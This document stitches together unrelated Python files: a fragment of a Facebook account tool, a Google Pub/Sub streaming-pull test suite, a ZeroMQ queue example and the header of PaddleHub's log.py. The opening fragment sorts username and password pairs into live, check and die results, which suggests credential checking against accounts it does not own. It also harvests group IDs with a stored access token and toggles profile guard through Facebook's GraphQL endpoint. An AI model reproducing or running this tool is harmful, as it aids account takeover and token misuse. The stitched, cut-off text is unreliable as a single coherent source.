print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
test_streaming_pull_manager.py
|
# Copyright 2018, Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import time
import types as stdlib_types
import mock
import pytest
from google.api_core import bidi
from google.api_core import exceptions
from google.cloud.pubsub_v1 import types
from google.cloud.pubsub_v1.gapic import subscriber_client_config
from google.cloud.pubsub_v1.subscriber import client
from google.cloud.pubsub_v1.subscriber import message
from google.cloud.pubsub_v1.subscriber import scheduler
from google.cloud.pubsub_v1.subscriber._protocol import dispatcher
from google.cloud.pubsub_v1.subscriber._protocol import heartbeater
from google.cloud.pubsub_v1.subscriber._protocol import leaser
from google.cloud.pubsub_v1.subscriber._protocol import messages_on_hold
from google.cloud.pubsub_v1.subscriber._protocol import requests
from google.cloud.pubsub_v1.subscriber._protocol import streaming_pull_manager
import grpc
@pytest.mark.parametrize(
"exception,expected_cls",
[
(ValueError("meep"), ValueError),
(
mock.create_autospec(grpc.RpcError, instance=True),
exceptions.GoogleAPICallError,
),
],
)
def test__maybe_wrap_exception(exception, expected_cls):
assert isinstance(
streaming_pull_manager._maybe_wrap_exception(exception), expected_cls
)
def test__wrap_callback_errors_no_error():
msg = mock.create_autospec(message.Message, instance=True)
callback = mock.Mock()
on_callback_error = mock.Mock()
streaming_pull_manager._wrap_callback_errors(callback, on_callback_error, msg)
callback.assert_called_once_with(msg)
msg.nack.assert_not_called()
on_callback_error.assert_not_called()
def test__wrap_callback_errors_error():
callback_error = ValueError("meep")
msg = mock.create_autospec(message.Message, instance=True)
callback = mock.Mock(side_effect=callback_error)
on_callback_error = mock.Mock()
streaming_pull_manager._wrap_callback_errors(callback, on_callback_error, msg)
msg.nack.assert_called_once()
on_callback_error.assert_called_once_with(callback_error)
def test_constructor_and_default_state():
manager = streaming_pull_manager.StreamingPullManager(
mock.sentinel.client, mock.sentinel.subscription
)
# Public state
assert manager.is_active is False
assert manager.flow_control == types.FlowControl()
assert manager.dispatcher is None
assert manager.leaser is None
assert manager.ack_histogram is not None
assert manager.ack_deadline == 10
assert manager.load == 0
# Private state
assert manager._client == mock.sentinel.client
assert manager._subscription == mock.sentinel.subscription
assert manager._scheduler is not None
assert manager._messages_on_hold is not None
def test_constructor_with_options():
manager = streaming_pull_manager.StreamingPullManager(
mock.sentinel.client,
mock.sentinel.subscription,
flow_control=mock.sentinel.flow_control,
scheduler=mock.sentinel.scheduler,
)
assert manager.flow_control == mock.sentinel.flow_control
assert manager._scheduler == mock.sentinel.scheduler
def make_manager(**kwargs):
client_ = mock.create_autospec(client.Client, instance=True)
scheduler_ = mock.create_autospec(scheduler.Scheduler, instance=True)
return streaming_pull_manager.StreamingPullManager(
client_, "subscription-name", scheduler=scheduler_, **kwargs
)
def fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10):
"""Add a simplified fake add() method to a leaser instance.
The fake add() method actually increases the leaser's internal message count
by one for each message, and the total bytes by ``assumed_msg_size`` for
each message (regardless of the actual message size).
"""
def fake_add(self, items):
self.message_count += len(items)
self.bytes += len(items) * assumed_msg_size
leaser.message_count = init_msg_count
leaser.bytes = init_msg_count * assumed_msg_size
leaser.add = stdlib_types.MethodType(fake_add, leaser)
def test_ack_deadline():
manager = make_manager()
assert manager.ack_deadline == 10
manager.ack_histogram.add(20)
assert manager.ack_deadline == 20
manager.ack_histogram.add(10)
assert manager.ack_deadline == 20
def test_maybe_pause_consumer_wo_consumer_set():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager.maybe_pause_consumer() # no raise
# Ensure load > 1
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
_leaser.message_count = 100
_leaser.bytes = 10000
manager.maybe_pause_consumer() # no raise
def test_lease_load_and_pause():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._leaser = leaser.Leaser(manager)
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = False
# This should mean that our messages count is at 10%, and our bytes
# are at 15%; load should return the higher (0.15), and shouldn't cause
# the consumer to pause.
manager.leaser.add(
[requests.LeaseRequest(ack_id="one", byte_size=150, ordering_key="")]
)
assert manager.load == 0.15
manager.maybe_pause_consumer()
manager._consumer.pause.assert_not_called()
# After this message is added, the messages should be higher at 20%
# (versus 16% for bytes).
manager.leaser.add(
[requests.LeaseRequest(ack_id="two", byte_size=10, ordering_key="")]
)
assert manager.load == 0.2
# Returning a number above 100% is fine, and it should cause this to pause.
manager.leaser.add(
[requests.LeaseRequest(ack_id="three", byte_size=1000, ordering_key="")]
)
assert manager.load == 1.16
manager.maybe_pause_consumer()
manager._consumer.pause.assert_called_once()
def test_drop_and_resume():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._leaser = leaser.Leaser(manager)
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = True
# Add several messages until we're over the load threshold.
manager.leaser.add(
[
requests.LeaseRequest(ack_id="one", byte_size=750, ordering_key=""),
requests.LeaseRequest(ack_id="two", byte_size=250, ordering_key=""),
]
)
assert manager.load == 1.0
# Trying to resume now should have no effect as we're over the threshold.
manager.maybe_resume_consumer()
manager._consumer.resume.assert_not_called()
# Drop the 250 byte message, which should put us under the resume
# threshold.
manager.leaser.remove(
[requests.DropRequest(ack_id="two", byte_size=250, ordering_key="")]
)
manager.maybe_resume_consumer()
manager._consumer.resume.assert_called_once()
def test_resume_not_paused():
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = False
# Resuming should have no effect if the consumer is not actually paused.
manager.maybe_resume_consumer()
manager._consumer.resume.assert_not_called()
def test_maybe_resume_consumer_wo_consumer_set():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager.maybe_resume_consumer() # no raise
def test__maybe_release_messages_on_overload():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
msg = mock.create_autospec(message.Message, instance=True, ack_id="ack", size=11)
manager._messages_on_hold.put(msg)
manager._on_hold_bytes = msg.size
# Ensure load is exactly 1.0 (to verify that >= condition is used)
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
_leaser.message_count = 10
_leaser.bytes = 1000 + msg.size
manager._maybe_release_messages()
assert manager._messages_on_hold.size == 1
manager._leaser.add.assert_not_called()
manager._scheduler.schedule.assert_not_called()
def test__maybe_release_messages_below_overload():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._callback = mock.sentinel.callback
# Init leaser message count to 11, so that when subtracting the 3 messages
# that are on hold, there is still room for another 2 messages before the
# max load is hit.
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
fake_leaser_add(_leaser, init_msg_count=11, assumed_msg_size=10)
messages = [
mock.create_autospec(message.Message, instance=True, ack_id="ack_foo", size=10),
mock.create_autospec(message.Message, instance=True, ack_id="ack_bar", size=10),
mock.create_autospec(message.Message, instance=True, ack_id="ack_baz", size=10),
]
for msg in messages:
manager._messages_on_hold.put(msg)
manager._on_hold_bytes = 3 * 10
# the actual call of MUT
manager._maybe_release_messages()
assert manager._messages_on_hold.size == 1
msg = manager._messages_on_hold.get()
assert msg.ack_id == "ack_baz"
schedule_calls = manager._scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
for _, call_args, _ in schedule_calls:
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].ack_id in ("ack_foo", "ack_bar")
def test__maybe_release_messages_negative_on_hold_bytes_warning(caplog):
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
msg = mock.create_autospec(message.Message, instance=True, ack_id="ack", size=17)
manager._messages_on_hold.put(msg)
manager._on_hold_bytes = 5 # too low for some reason
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
_leaser.message_count = 3
_leaser.bytes = 150
with caplog.at_level(logging.WARNING):
manager._maybe_release_messages()
expected_warnings = [
record.message.lower()
for record in caplog.records
if "unexpectedly negative" in record.message
]
assert len(expected_warnings) == 1
assert "on hold bytes" in expected_warnings[0]
assert "-12" in expected_warnings[0]
assert manager._on_hold_bytes == 0 # should be auto-corrected
def test_send_unary():
manager = make_manager()
manager._UNARY_REQUESTS = True
manager.send(
types.StreamingPullRequest(
ack_ids=["ack_id1", "ack_id2"],
modify_deadline_ack_ids=["ack_id3", "ack_id4", "ack_id5"],
modify_deadline_seconds=[10, 20, 20],
)
)
manager._client.acknowledge.assert_called_once_with(
subscription=manager._subscription, ack_ids=["ack_id1", "ack_id2"]
)
manager._client.modify_ack_deadline.assert_has_calls(
[
mock.call(
subscription=manager._subscription,
ack_ids=["ack_id3"],
ack_deadline_seconds=10,
),
mock.call(
subscription=manager._subscription,
ack_ids=["ack_id4", "ack_id5"],
ack_deadline_seconds=20,
),
],
any_order=True,
)
def test_send_unary_empty():
manager = make_manager()
manager._UNARY_REQUESTS = True
manager.send(types.StreamingPullRequest())
manager._client.acknowledge.assert_not_called()
manager._client.modify_ack_deadline.assert_not_called()
def test_send_unary_api_call_error(caplog):
caplog.set_level(logging.DEBUG)
manager = make_manager()
manager._UNARY_REQUESTS = True
error = exceptions.GoogleAPICallError("The front fell off")
manager._client.acknowledge.side_effect = error
manager.send(types.StreamingPullRequest(ack_ids=["ack_id1", "ack_id2"]))
assert "The front fell off" in caplog.text
def test_send_unary_retry_error(caplog):
caplog.set_level(logging.DEBUG)
manager, _, _, _, _, _ = make_running_manager()
manager._UNARY_REQUESTS = True
error = exceptions.RetryError(
"Too long a transient error", cause=Exception("Out of time!")
)
manager._client.acknowledge.side_effect = error
with pytest.raises(exceptions.RetryError):
manager.send(types.StreamingPullRequest(ack_ids=["ack_id1", "ack_id2"]))
assert "RetryError while sending unary RPC" in caplog.text
assert "signaled streaming pull manager shutdown" in caplog.text
def test_send_streaming():
manager = make_manager()
manager._UNARY_REQUESTS = False
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager.send(mock.sentinel.request)
manager._rpc.send.assert_called_once_with(mock.sentinel.request)
def test_heartbeat():
manager = make_manager()
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager._rpc.is_active = True
manager.heartbeat()
manager._rpc.send.assert_called_once_with(types.StreamingPullRequest())
def test_heartbeat_inactive():
manager = make_manager()
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager._rpc.is_active = False
manager.heartbeat()
manager._rpc.send.assert_not_called()
@mock.patch("google.api_core.bidi.ResumableBidiRpc", autospec=True)
@mock.patch("google.api_core.bidi.BackgroundConsumer", autospec=True)
@mock.patch("google.cloud.pubsub_v1.subscriber._protocol.leaser.Leaser", autospec=True)
@mock.patch(
"google.cloud.pubsub_v1.subscriber._protocol.dispatcher.Dispatcher", autospec=True
)
@mock.patch(
"google.cloud.pubsub_v1.subscriber._protocol.heartbeater.Heartbeater", autospec=True
)
def test_open(heartbeater, dispatcher, leaser, background_consumer, resumable_bidi_rpc):
manager = make_manager()
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
heartbeater.assert_called_once_with(manager)
heartbeater.return_value.start.assert_called_once()
assert manager._heartbeater == heartbeater.return_value
dispatcher.assert_called_once_with(manager, manager._scheduler.queue)
dispatcher.return_value.start.assert_called_once()
assert manager._dispatcher == dispatcher.return_value
leaser.assert_called_once_with(manager)
leaser.return_value.start.assert_called_once()
assert manager.leaser == leaser.return_value
background_consumer.assert_called_once_with(manager._rpc, manager._on_response)
background_consumer.return_value.start.assert_called_once()
assert manager._consumer == background_consumer.return_value
resumable_bidi_rpc.assert_called_once_with(
start_rpc=manager._client.api.streaming_pull,
initial_request=mock.ANY,
should_recover=manager._should_recover,
should_terminate=manager._should_terminate,
throttle_reopen=True,
)
initial_request_arg = resumable_bidi_rpc.call_args.kwargs["initial_request"]
assert initial_request_arg.func == manager._get_initial_request
assert initial_request_arg.args[0] == 10 # the default stream ACK timeout
assert not manager._client.api.get_subscription.called
resumable_bidi_rpc.return_value.add_done_callback.assert_called_once_with(
manager._on_rpc_done
)
assert manager._rpc == resumable_bidi_rpc.return_value
manager._consumer.is_active = True
assert manager.is_active is True
def test_open_already_active():
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_active = True
with pytest.raises(ValueError, match="already open"):
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
def test_open_has_been_closed():
manager = make_manager()
manager._closed = True
with pytest.raises(ValueError, match="closed"):
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
def make_running_manager():
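"""Return a manager wired to autospec mocks (consumer, dispatcher, leaser,
heartbeater), plus those mocks and the scheduler in the order the tests unpack them."""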
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_active = True
manager._dispatcher = mock.create_autospec(dispatcher.Dispatcher, instance=True)
manager._leaser = mock.create_autospec(leaser.Leaser, instance=True)
manager._heartbeater = mock.create_autospec(heartbeater.Heartbeater, instance=True)
return (
manager,
manager._consumer,
manager._dispatcher,
manager._leaser,
manager._heartbeater,
manager._scheduler,
)
def test_close():
manager, consumer, dispatcher, leaser, heartbeater, scheduler = (
make_running_manager()
)
manager.close()
consumer.stop.assert_called_once()
leaser.stop.assert_called_once()
dispatcher.stop.assert_called_once()
heartbeater.stop.assert_called_once()
scheduler.shutdown.assert_called_once()
assert manager.is_active is False
def test_close_inactive_consumer():
manager, consumer, dispatcher, leaser, heartbeater, scheduler = (
make_running_manager()
)
consumer.is_active = False
manager.close()
consumer.stop.assert_not_called()
leaser.stop.assert_called_once()
dispatcher.stop.assert_called_once()
heartbeater.stop.assert_called_once()
scheduler.shutdown.assert_called_once()
def test_close_idempotent():
manager, _, _, _, _, scheduler = make_running_manager()
manager.close()
manager.close()
assert scheduler.shutdown.call_count == 1
class FakeDispatcher(object):
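"""Dispatcher double that keeps poking the leaser from a background thread,
including once more after stop(), to exercise shutdown races in close()."""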
def __init__(self, manager, error_callback):
self._manager = manager
self._error_callback = error_callback
self._thread = None
self._stop = False
def start(self):
self._thread = threading.Thread(target=self._do_work)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._stop = True
self._thread.join()
self._thread = None
def _do_work(self):
while not self._stop:
try:
self._manager.leaser.add([mock.Mock()])
except Exception as exc:
self._error_callback(exc)
time.sleep(0.1)
# also try to interact with the leaser after the stop flag has been set
try:
self._manager.leaser.remove([mock.Mock()])
except Exception as exc:
self._error_callback(exc)
def test_close_no_dispatcher_error():
manager, _, _, _, _, _ = make_running_manager()
error_callback = mock.Mock(name="error_callback")
dispatcher = FakeDispatcher(manager=manager, error_callback=error_callback)
manager._dispatcher = dispatcher
dispatcher.start()
manager.close()
error_callback.assert_not_called()
def test_close_callbacks():
manager, _, _, _, _, _ = make_running_manager()
callback = mock.Mock()
manager.add_close_callback(callback)
manager.close(reason="meep")
callback.assert_called_once_with(manager, "meep")
def test__get_initial_request():
manager = make_manager()
manager._leaser = mock.create_autospec(leaser.Leaser, instance=True)
manager._leaser.ack_ids = ["1", "2"]
initial_request = manager._get_initial_request(123)
assert isinstance(initial_request, types.StreamingPullRequest)
assert initial_request.subscription == "subscription-name"
assert initial_request.stream_ack_deadline_seconds == 123
assert initial_request.modify_deadline_ack_ids == ["1", "2"]
assert initial_request.modify_deadline_seconds == [10, 10]
def test__get_initial_request_wo_leaser():
manager = make_manager()
manager._leaser = None
initial_request = manager._get_initial_request(123)
assert isinstance(initial_request, types.StreamingPullRequest)
assert initial_request.subscription == "subscription-name"
assert initial_request.stream_ack_deadline_seconds == 123
assert initial_request.modify_deadline_ack_ids == []
assert initial_request.modify_deadline_seconds == []
def test__on_response_delivery_attempt():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = types.StreamingPullResponse(
received_messages=[
types.ReceivedMessage(
ack_id="fack", message=types.PubsubMessage(data=b"foo", message_id="1")
),
types.ReceivedMessage(
ack_id="back",
message=types.PubsubMessage(data=b"bar", message_id="2"),
delivery_attempt=6,
),
]
)
# adjust message bookkeeping in leaser
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=42)
manager._on_response(response)
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
msg1 = schedule_calls[0][1][1]
assert msg1.delivery_attempt is None
msg2 = schedule_calls[1][1][1]
assert msg2.delivery_attempt == 6
def test__on_response_no_leaser_overload():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = types.StreamingPullResponse(
received_messages=[
types.ReceivedMessage(
ack_id="fack", message=types.PubsubMessage(data=b"foo", message_id="1")
),
types.ReceivedMessage(
ack_id="back", message=types.PubsubMessage(data=b"bar", message_id="2")
),
]
)
# adjust message bookkeeping in leaser
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=42)
# Actually run the method and prove that modack and schedule
# are called in the expected way.
manager._on_response(response)
dispatcher.modify_ack_deadline.assert_called_once_with(
[requests.ModAckRequest("fack", 10), requests.ModAckRequest("back", 10)]
)
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
for call in schedule_calls:
assert call[1][0] == mock.sentinel.callback
assert isinstance(call[1][1], message.Message)
# the leaser load limit was not hit, so no messages had to be put on hold
assert manager._messages_on_hold.size == 0
def test__on_response_with_leaser_overload():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = types.StreamingPullResponse(
received_messages=[
types.ReceivedMessage(
ack_id="fack", message=types.PubsubMessage(data=b"foo", message_id="1")
),
types.ReceivedMessage(
ack_id="back", message=types.PubsubMessage(data=b"bar", message_id="2")
),
types.ReceivedMessage(
ack_id="zack", message=types.PubsubMessage(data=b"baz", message_id="3")
),
]
)
# Adjust message bookkeeping in leaser. Pick 999 messages, which is just below
# the default FlowControl.max_messages limit.
fake_leaser_add(leaser, init_msg_count=999, assumed_msg_size=10)
# Actually run the method and prove that modack and schedule
# are called in the expected way.
manager._on_response(response)
# all messages should be added to the lease management and have their ACK
# deadline extended, even those not dispatched to callbacks
dispatcher.modify_ack_deadline.assert_called_once_with(
[
requests.ModAckRequest("fack", 10),
requests.ModAckRequest("back", 10),
requests.ModAckRequest("zack", 10),
]
)
# one message should be scheduled, the flow control limits allow for it
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 1
call_args = schedule_calls[0][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "1"
# the rest of the messages should have been put on hold
assert manager._messages_on_hold.size == 2
while True:
msg = manager._messages_on_hold.get()
if msg is None:
break
else:
assert isinstance(msg, message.Message)
assert msg.message_id in ("2", "3")
def test__on_response_none_data(caplog):
caplog.set_level(logging.DEBUG)
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# adjust message bookkeeping in leaser
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10)
manager._on_response(response=None)
scheduler.schedule.assert_not_called()
assert "callback invoked with None" in caplog.text
def test__on_response_with_ordering_keys():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = types.StreamingPullResponse(
received_messages=[
types.ReceivedMessage(
ack_id="fack",
message=types.PubsubMessage(
data=b"foo", message_id="1", ordering_key=""
),
),
types.ReceivedMessage(
ack_id="back",
message=types.PubsubMessage(
data=b"bar", message_id="2", ordering_key="key1"
),
),
types.ReceivedMessage(
ack_id="zack",
message=types.PubsubMessage(
data=b"baz", message_id="3", ordering_key="key1"
),
),
]
)
# Make leaser with zero initial messages, so we don't test lease management
# behavior.
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10)
# Actually run the method and prove that modack and schedule are called in
# the expected way.
manager._on_response(response)
# All messages should be added to the lease management and have their ACK
# deadline extended, even those not dispatched to callbacks.
dispatcher.modify_ack_deadline.assert_called_once_with(
[
requests.ModAckRequest("fack", 10),
requests.ModAckRequest("back", 10),
requests.ModAckRequest("zack", 10),
]
)
# The first two messages should be scheduled. The third should be put on
# hold because it's blocked by the completion of the second, which has the
# same ordering key.
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
call_args = schedule_calls[0][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "1"
call_args = schedule_calls[1][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "2"
# Message 3 should have been put on hold.
assert manager._messages_on_hold.size == 1
# No messages available because message 2 (with "key1") has not completed yet.
assert manager._messages_on_hold.get() is None
# Complete message 2 (with "key1").
manager.activate_ordering_keys(["key1"])
# Completing message 2 should release message 3.
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 3
call_args = schedule_calls[2][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "3"
# No messages available in the queue.
assert manager._messages_on_hold.get() is None
def test_retryable_stream_errors():
# Make sure the config matches our hard-coded tuple of exceptions.
interfaces = subscriber_client_config.config["interfaces"]
retry_codes = interfaces["google.pubsub.v1.Subscriber"]["retry_codes"]
idempotent = retry_codes["idempotent"]
status_codes = tuple(getattr(grpc.StatusCode, name, None) for name in idempotent)
expected = tuple(
exceptions.exception_class_for_grpc_status(status_code)
for status_code in status_codes
)
assert set(expected).issubset(set(streaming_pull_manager._RETRYABLE_STREAM_ERRORS))
def test__should_recover_true():
manager = make_manager()
details = "UNAVAILABLE. Service taking nap."
exc = exceptions.ServiceUnavailable(details)
assert manager._should_recover(exc) is True
def test__should_recover_false():
manager = make_manager()
exc = TypeError("wahhhhhh")
assert manager._should_recover(exc) is False
def test__should_terminate_true():
manager = make_manager()
details = "Cancelled. Go away, before I taunt you a second time."
exc = exceptions.Cancelled(details)
assert manager._should_terminate(exc) is True
def test__should_terminate_false():
manager = make_manager()
exc = TypeError("wahhhhhh")
assert manager._should_terminate(exc) is False
@mock.patch("threading.Thread", autospec=True)
def test__on_rpc_done(thread):
manager = make_manager()
manager._on_rpc_done(mock.sentinel.error)
thread.assert_called_once_with(
name=mock.ANY, target=manager.close, kwargs={"reason": mock.sentinel.error}
)
def test_activate_ordering_keys():
manager = make_manager()
manager._messages_on_hold = mock.create_autospec(
messages_on_hold.MessagesOnHold, instance=True
)
manager.activate_ordering_keys(["key1", "key2"])
manager._messages_on_hold.activate_ordering_keys.assert_called_once_with(
["key1", "key2"], mock.ANY
)
|
queuecrazy.py
|
#!/usr/bin/env python
# Foundations of Python Network Programming - Chapter 8 - queuecrazy.py
# Small application that uses several different message queues
import random, threading, time, zmq
zcontext = zmq.Context()
def fountain(url):
"""Produces a steady stream of words."""
zsock = zcontext.socket(zmq.PUSH)
zsock.bind(url)
words = [ w for w in dir(__builtins__) if w.islower() ]
while True:
zsock.send(random.choice(words))
time.sleep(0.4)
def responder(url, function):
"""Performs a string operation on each word received."""
zsock = zcontext.socket(zmq.REP)
zsock.bind(url)
while True:
word = zsock.recv()
zsock.send(function(word)) # send the modified word back
def processor(n, fountain_url, responder_urls):
"""Read words as they are produced; get them processed; print them."""
zpullsock = zcontext.socket(zmq.PULL)
zpullsock.connect(fountain_url)
zreqsock = zcontext.socket(zmq.REQ)
for url in responder_urls:
zreqsock.connect(url)
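# A REQ socket connected to several endpoints round-robins successive requests
# among them, so the upper- and lower-casing responders share the work.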
while True:
word = zpullsock.recv()
zreqsock.send(word)
print n, zreqsock.recv()
def start_thread(function, *args):
thread = threading.Thread(target=function, args=args)
thread.daemon = True # so you can easily Control-C the whole program
thread.start()
start_thread(fountain, 'tcp://127.0.0.1:6700')
start_thread(responder, 'tcp://127.0.0.1:6701', str.upper)
start_thread(responder, 'tcp://127.0.0.1:6702', str.lower)
for n in range(3):
start_thread(processor, n + 1, 'tcp://127.0.0.1:6700',
['tcp://127.0.0.1:6701', 'tcp://127.0.0.1:6702'])
time.sleep(30)
|
log.py
|
# coding:utf-8
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import functools
import logging
import os
import sys
import time
import threading
from typing import List
import colorlog
from colorama import Fore
import paddlehub.config as hubconf
